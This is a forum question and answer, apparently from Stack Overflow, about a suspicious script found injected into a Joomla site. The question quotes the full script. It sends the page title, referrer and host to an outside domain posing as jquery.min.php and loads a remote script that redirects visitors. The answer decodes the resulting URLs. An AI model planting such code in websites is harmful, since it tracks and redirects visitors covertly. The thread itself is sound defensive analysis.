Amirreza Amirreza - 2 months ago 8
Javascript Question

What is this javascript code doing

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.vermessung-stuetz.de/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>


It was on my site (joomla theme),

I suspect to this code!

Answer

It will load a script from the following website:

http://www.vermessung-stuetz.de/js/jquery.min.php?c_utt=snt2014&c_utm=http%3A%2F%2Fwww.vermessung-stuetz.de%2Fjs%2Fjquery.min.php%3Fdefault_keyword%3D[WEBSITE TITLE]%26se_referrer%3D[DOMAIN OF YOUR WEBSITE]%26source%3D[REFFERER]

If I would execute that code NOW, the url would be:

http://www.vermessung-stuetz.de/js/jquery.min.php?c_utt=snt2014&c_utm=http%3A%2F%2Fwww.vermessung-stuetz.de%2Fjs%2Fjquery.min.php%3Fdefault_keyword%3Djoomla%2520-%2520What%2520is%2520this%2520javascript%2520code%2520doing%2520-%2520Stack%2520Overflow%26se_referrer%3Dhttp%253A%252F%252Fstackoverflow.com%252Fquestions%252Ftagged%252Fjavascript%26source%3Dstackoverflow.com

That script will redirect user to a site, but it seems to ban you if you visit it two times. I visited the url I was redirected to and I only saw a Google Chrome survey.
Then I tried using a proxy and one of the things you might get is:

window.location.href='/HH4t0?sid1=mix_keywords';

The fact of it hidding in a jquery.min file makes me belive it's not something wanted.

Comments